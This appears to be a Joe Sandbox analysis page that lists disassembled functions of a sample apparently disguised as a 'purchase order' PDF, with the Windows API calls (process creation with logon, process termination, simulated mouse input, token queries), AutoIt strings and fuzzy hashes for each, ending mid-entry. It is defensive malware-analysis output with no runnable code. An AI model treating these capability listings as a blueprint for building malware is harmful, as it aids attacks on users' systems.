Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: c89250c5d8d7d2d0d7b287ca8907061b43959c666cb823d96f87ba3e041479af
Instruction ID: 978ea79aee3090cfa106d0ed678fa543350c3435b16db36f83557a6429bb352d
Opcode Fuzzy Hash: c89250c5d8d7d2d0d7b287ca8907061b43959c666cb823d96f87ba3e041479af
Instruction Fuzzy Hash: 35418071104301AFDB11DF28C888F767BE8FB5A724F148629F6A8C66A6C731D845DB62

Function 008FB958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(009367B0,00000000,01226E10,?,?,009367B0,?,008FB862,?,?), ref: 008FB9CC
EnableWindow.USER32(00000000,00000000), ref: 008FB9F0
ShowWindow.USER32(009367B0,00000000,01226E10,?,?,009367B0,?,008FB862,?,?), ref: 008FBA50
ShowWindow.USER32(00000000,00000004,?,008FB862,?,?), ref: 008FBA62
EnableWindow.USER32(00000000,00000001), ref: 008FBA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 008FBAA9

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: b30ff0cd1791973b219e2b9fa98896d0071ec8ccffb7edc553bc26433f5847c5
Instruction ID: 4d30630590a24676c6f75fb582ad43f85ecaf83548ad5de6538810cfca60ad6f
Opcode Fuzzy Hash: b30ff0cd1791973b219e2b9fa98896d0071ec8ccffb7edc553bc26433f5847c5
Instruction Fuzzy Hash: 38414E34601259AFDB21CF38D889BA57BE0FF05310F1842A9EB58CF6A2D771E845CB51

Function 008E73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,008E5134,?,?,00000000,00000001), ref: 008E73BF

Part of subcall function 008E3C94: GetWindowRect.USER32(?,?), ref: 008E3CA7

GetDesktopWindow.USER32 ref: 008E73E9
GetWindowRect.USER32(00000000), ref: 008E73F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 008E7422

Part of subcall function 008D54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008D555E

GetCursorPos.USER32(?), ref: 008E744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008E74AC

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: ae09d2d5a684ac33399d1e0724e6147799d1567cd6e750eee89cfe2d414374fa
Instruction ID: c7f37e7b69f3c642a3f9a695e933d2ca78a52c4b8c6892cad004f8298e1f9713
Opcode Fuzzy Hash: ae09d2d5a684ac33399d1e0724e6147799d1567cd6e750eee89cfe2d414374fa
Instruction Fuzzy Hash: BB31E672508345ABD720DF25D849F5BBBE9FF89314F00091AF588D7191DB30E908CB96

Function 008C8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008C85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008C8608
Part of subcall function 008C85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008C8612
Part of subcall function 008C85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008C8621
Part of subcall function 008C85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008C8628
Part of subcall function 008C85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008C863E

GetLengthSid.ADVAPI32(?,00000000,008C8977), ref: 008C8DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 008C8DB8
HeapAlloc.KERNEL32(00000000), ref: 008C8DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 008C8DD8
GetProcessHeap.KERNEL32(00000000,00000000,008C8977), ref: 008C8DEC
HeapFree.KERNEL32(00000000), ref: 008C8DF3

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 43117851539f12e39da1bfe063d9be4e6fcc70482b8a978608754945cf781f27
Instruction ID: 4e7f596f6ea93aaafadaa046d5b6345792e14798f125c918dd24151dab1d6b67
Opcode Fuzzy Hash: 43117851539f12e39da1bfe063d9be4e6fcc70482b8a978608754945cf781f27
Instruction Fuzzy Hash: 77118632680605EBDB109BA4CC49FAA7BB9FF55316F10802DEA46D7251CB32E940CB60

Function 008C8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008C8B2A
OpenProcessToken.ADVAPI32(00000000), ref: 008C8B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008C8B40
CloseHandle.KERNEL32(00000004), ref: 008C8B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008C8B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 008C8B8E

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: eb94ab061dd727d79392cea77ac3766798e7c26e53f9846562437aaa65f46c17
Instruction ID: aad75836c739bea3abb5cf22c27ea3e1cd2b992fd0e7ef8afda36599bb021ff1
Opcode Fuzzy Hash: eb94ab061dd727d79392cea77ac3766798e7c26e53f9846562437aaa65f46c17
Instruction Fuzzy Hash: 23111AB2541249EBDB018FA4DD49FEA7BB9FF48314F044069FA04A2161C776DD60DB60

Function 008FC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 008712F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0087134D
Part of subcall function 008712F3: SelectObject.GDI32(?,00000000), ref: 0087135C
Part of subcall function 008712F3: BeginPath.GDI32(?), ref: 00871373
Part of subcall function 008712F3: SelectObject.GDI32(?,00000000), ref: 0087139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 008FC1C4
LineTo.GDI32(00000000,00000003,?), ref: 008FC1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 008FC1E6
LineTo.GDI32(00000000,00000000,?), ref: 008FC1F6
EndPath.GDI32(00000000), ref: 008FC206
StrokePath.GDI32(00000000), ref: 008FC216

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 013769be0572518ed401de469a225e65ebaad293086ea76f9986401e893a51b4
Instruction ID: ccb30cc4960dc12566189205229d7054bade7a0e63ccf6040da6b806d77cbd82
Opcode Fuzzy Hash: 013769be0572518ed401de469a225e65ebaad293086ea76f9986401e893a51b4
Instruction Fuzzy Hash: 5711DE7640414DBFDF129FA4DC88EAA7FADFF08354F048021BA1896162D7719E55DFA0

Function 008903A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 008903D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 008903DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 008903E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 008903F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 008903F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00890401

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: b210bc67f7e80dce29ca04135973265776ae289b424e7ffaa600102106a12e52
Instruction ID: 0f524826a5df99600b93ac73d2cb37933e3ecf3dbc390c73d2957a5e2ef29b4d
Opcode Fuzzy Hash: b210bc67f7e80dce29ca04135973265776ae289b424e7ffaa600102106a12e52
Instruction Fuzzy Hash: BE016CB09017597DE3008F6A8C85B52FFA8FF19354F00411BA15C87942C7F5A864CBE5

Function 008D568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008D569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008D56B1
GetWindowThreadProcessId.USER32(?,?), ref: 008D56C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008D56CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008D56D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008D56E0

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: a8ca8fd427aca17f029ea197027f5e258cb4f10b6fd2f718cc39bd2db0e88922
Instruction ID: df62bbd9e089132d5fcb15cb8c997a2cc878af4190e0193459a63eec951cdde4
Opcode Fuzzy Hash: a8ca8fd427aca17f029ea197027f5e258cb4f10b6fd2f718cc39bd2db0e88922
Instruction Fuzzy Hash: 6AF06D32241118BBE7215BA2AC0DEFB7B7CFFD6B11F00016AFB00D11529AA45A01C6B5

Function 008D74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 008D74E5
EnterCriticalSection.KERNEL32(?,?,00881044,?,?), ref: 008D74F6
TerminateThread.KERNEL32(00000000,000001F6,?,00881044,?,?), ref: 008D7503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00881044,?,?), ref: 008D7510

Part of subcall function 008D6ED7: CloseHandle.KERNEL32(00000000,?,008D751D,?,00881044,?,?), ref: 008D6EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 008D7523
LeaveCriticalSection.KERNEL32(?,?,00881044,?,?), ref: 008D752A

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: ed39f10ba0e5dd81392017d44040c2644dd9d1f8eecacc5eb313a398249ba29d
Instruction ID: 21ef7c094c9ac56989c31520541645218d20c26cadbf33b142ee303756ffa5c6
Opcode Fuzzy Hash: ed39f10ba0e5dd81392017d44040c2644dd9d1f8eecacc5eb313a398249ba29d
Instruction Fuzzy Hash: 2CF03A3A140612ABDB121B74FC88DEA7B3AFF45302B100632F202911A2EB755851CA51

Function 008C8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 008C8E7F
UnloadUserProfile.USERENV(?,?), ref: 008C8E8B
CloseHandle.KERNEL32(?), ref: 008C8E94
CloseHandle.KERNEL32(?), ref: 008C8E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 008C8EA5
HeapFree.KERNEL32(00000000), ref: 008C8EAC

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 220b2383bdb30873b577888433c78f55d008d3be20e3164a746d1e06c58ba159
Instruction ID: 0fad996a87414e647e3cfaa05e56fc82393753deb0c755c85c02425304b69071
Opcode Fuzzy Hash: 220b2383bdb30873b577888433c78f55d008d3be20e3164a746d1e06c58ba159
Instruction Fuzzy Hash: CAE04E76104506EBDA022BB6EC08D6ABB69FF89762B548621F31981571CB329461DB50

Function 008E8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 008E8928
CharUpperBuffW.USER32(?,?), ref: 008E8A37
VariantClear.OLEAUT32(?), ref: 008E8BAF

Part of subcall function 008D7804: VariantInit.OLEAUT32(00000000), ref: 008D7844
Part of subcall function 008D7804: VariantCopy.OLEAUT32(00000000,?), ref: 008D784D
Part of subcall function 008D7804: VariantClear.OLEAUT32(00000000), ref: 008D7859

Strings

AUTOIT.ERROR, xrefs: 008E8A3D
Incorrect Parameter format, xrefs: 008E8960, 008E8B22

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 5404c67721cef7fe7ceb3d9fb0c8dee061ce83c6d941f9ff56461226d69c8b46
Instruction ID: 11c3d9259aa694a664f1f68fa7ad8616783f8ea1b8850db025c4314de0e44a9c
Opcode Fuzzy Hash: 5404c67721cef7fe7ceb3d9fb0c8dee061ce83c6d941f9ff56461226d69c8b46
Instruction Fuzzy Hash: 349128716083459FC710EF29C48496ABBE4FF99714F04896EF89ACB262DB31E905CB52

Function 008D2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0088FEC6: _wcscpy.LIBCMT ref: 0088FEE9

_memset.LIBCMT ref: 008D3077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008D30A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008D3159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 008D3187

Strings

0, xrefs: 008D3063

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 234f4f3c1e6c749d2d44d583a8fff257f5c04ccbac5ae4735db2e59855b76b27
Instruction ID: bc9d1943e5e83746668966a7be3242b8c34b9701c259b9cfd46f9717aa6456c1
Opcode Fuzzy Hash: 234f4f3c1e6c749d2d44d583a8fff257f5c04ccbac5ae4735db2e59855b76b27
Instruction Fuzzy Hash: 1B51A031608302AADB25AF28D845A6BB7E8FF55354F044B2EF895D6391DB70CE44CB63

Function 008CDA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 008CDAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008CDAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 008CDB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008CDB8E

Strings

DllGetClassObject, xrefs: 008CDB01

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 00e01d82060dd4d13196094f01b15c45fe60c2dbf309e214660ff6a247093922
Instruction ID: 5c7a660f5666f41c5b50918be1a38c3a938e33b354bbda58f4b6ba134bf822fc
Opcode Fuzzy Hash: 00e01d82060dd4d13196094f01b15c45fe60c2dbf309e214660ff6a247093922
Instruction Fuzzy Hash: 2A4117B1600309AFDB15DF64C884FAA7BB9FF44364B1580AEA905DF246D7B1DD44CBA0

Function 008D2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008D2CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008D2CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 008D2D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00936890,00000000), ref: 008D2D5A

Strings

0, xrefs: 008D2CA4

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 0e493542a8569dece05794ebfe29bf88079d3776cee9a7af67fa0807b15a0ec6
Instruction ID: 8e71b939f4e28a4d5aae00ac90ec51a84e29e1aa0e0e783998a7d9c96a4db1be
Opcode Fuzzy Hash: 0e493542a8569dece05794ebfe29bf88079d3776cee9a7af67fa0807b15a0ec6
Instruction Fuzzy Hash: 59418E302053059FD720DF28C884B1ABBA9FF95320F14466EF965D7391DB70E905CB92

Function 008EDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 008EDAD9

Part of subcall function 008779AB: _memmove.LIBCMT ref: 008779F9

Strings

winapi, xrefs: 008EDB4A
none, xrefs: 008EDBB4
stdcall, xrefs: 008EDB5B
cdecl, xrefs: 008EDB30

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 6871d507dd571fd9b9238ce7dea22f6882f9c681af496fb48ac5276100a50612
Instruction ID: ba5841b7849cd196b26a392ddcbc00d6d261cc7695a6a837dcece45a1cc773e0
Opcode Fuzzy Hash: 6871d507dd571fd9b9238ce7dea22f6882f9c681af496fb48ac5276100a50612
Instruction Fuzzy Hash: 6C319271500719AFCF10EF59CC819AEB3B4FF56320B108A29E865EB6D5DB71E909CB81

Function 008C9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00877F41: _memmove.LIBCMT ref: 00877F82

Part of subcall function 008CB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008CB0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008C93F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 008C9409
SendMessageW.USER32(?,00000189,?,00000000), ref: 008C9439

Part of subcall function 00877D2C: _memmove.LIBCMT ref: 00877D66

Strings

ComboBox, xrefs: 008C9380
ListBox, xrefs: 008C93B5

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 45eaf22fabc6947b7e7f9201c81210b9a8db40dd2db8ace4c0c3bdac9eb62a34
Instruction ID: c215c1e0cb19f3a455b232b4f6175c64c64b4e62278a02414c2dab8525471c86
Opcode Fuzzy Hash: 45eaf22fabc6947b7e7f9201c81210b9a8db40dd2db8ace4c0c3bdac9eb62a34
Instruction Fuzzy Hash: 4B21F271900108AADB18AB78DC8ADFEB778FF05350B10816DF965D72E5DB398A0AC621

Function 008F6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00871D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00871D73
Part of subcall function 00871D35: GetStockObject.GDI32(00000011), ref: 00871D87
